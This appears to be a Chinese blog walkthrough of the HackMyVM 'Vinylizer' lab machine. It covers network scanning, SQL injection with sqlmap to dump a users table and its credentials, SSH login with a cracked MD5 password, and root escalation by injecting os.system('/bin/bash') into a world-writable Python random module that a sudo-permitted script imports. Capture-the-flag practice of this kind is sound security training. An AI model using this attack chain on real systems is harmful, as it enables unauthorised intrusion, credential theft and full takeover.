[HackMyVm] Vinulizer

最新推荐文章于 2024-05-16 04:42:14 发布

tao0845

最新推荐文章于 2024-05-16 04:42:14 发布

阅读量232

点赞数 3

分类专栏： hackmyvm 文章标签：网络空间安全内网渗透 WEB

本文链接：https://blog.csdn.net/qq_34942239/article/details/136693764

版权

hackmyvm 专栏收录该内容

36 篇文章 0 订阅

订阅专栏

kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:37:8d:16       PCS Systemtechnik GmbH
192.168.56.119  08:00:27:6d:ec:17       PCS Systemtechnik GmbH

靶机:192.168.56.119

端口扫描

nmap 192.168.56.119

22/tcp open  ssh
80/tcp open  http

目录扫描

gobuster dir -u http://192.168.56.119 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[22:26:45] 301 -  314B  - /img  ->  http://192.168.56.119/img/              
[22:26:50] 200 -  637B  - /login.php

在login界面测试发现可以sql注入

抓包放到sqlmap里面跑

sqlmap -l a.txt --batch --dbs
[*] information_schema
[*] performance_schema
[*] vinyl_marketplace

# sqlmap -l a.txt --batch -D vinyl_marketplace --tables
+-------+
| users |
+-------+

# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --columns
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| id             | int          |
| login_attempts | int          |
| password       | varchar(255) |
| username       | varchar(255) |
+----------------+--------------+

# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --dump
+----+----------------------------------+-----------+----------------+
| id | password                         | username  | login_attempts |
+----+----------------------------------+-----------+----------------+
| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |
| 2  | password123                      | lana      | 0              |
+----+----------------------------------+-----------+----------------+

lana登录发现没有东西

shopadmin的password经过md5解密得到addicted2vinyl

但是登录不上网页可以连接ssh

# ssh shopadmin@192.168.56.119
shopadmin@192.168.56.119's password: 
...
shopadmin@vinylizer:~$

$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User shopadmin may run the following commands on vinylizer:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py

/opt/vinylizer.py有root权限

但是文件不可修改，只能从模块下手

打开发现引入json和random模块

shopadmin@vinylizer:/opt$ find / -name json.py 2>/dev/null
/snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ ls -al /snap/lxd/24322/share/openvswitch/python/ovs/json.py
-rw-r--r-- 1 root root 16843 Jan 17  2023 /snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ find / -name random.py 2>/dev/null
/snap/core20/1974/usr/lib/python3.8/random.py
/usr/lib/python3.10/random.py
shopadmin@vinylizer:/opt$ ls -al /snap/core20/1974/usr/lib/python3.8/random.py
-rw-r--r-- 1 root root 28802 May 26  2023 /snap/core20/1974/usr/lib/python3.8/random.py
shopadmin@vinylizer:/opt$ ls -al /usr/lib/python3.10/random.py
-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py

/usr/lib/python3.10/random.py是有修改权限的，正好又是导入的那个random模块

>>> import random
>>> random
<module 'random' from '/usr/lib/python3.10/random.py'>

修改一下这个包

在import的下面加上

 _os.system("/bin/bash")

然后执行就ok了

sudo /usr/bin/python3 /opt/vinylizer.py

shopadmin@vinylizer:~$ sudo /usr/bin/python3 /opt/vinylizer.py
root@vinylizer:/home/shopadmin# whoami
root

tao0845

关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
[HackMyVm] Vinulizer

usr/lib/python3.10/random.py是有修改权限的，正好又是导入的那个random模块。shopadmin的password经过md5解密得到addicted2vinyl。/opt/vinylizer.py有root权限。在login界面测试发现可以sql注入。打开发现引入json和random模块。但是文件不可修改，只能从模块下手。但是登录不上网页可以连接ssh。抓包放到sqlmap里面跑。lana登录发现没有东西。在import的下面加上。
复制链接

扫一扫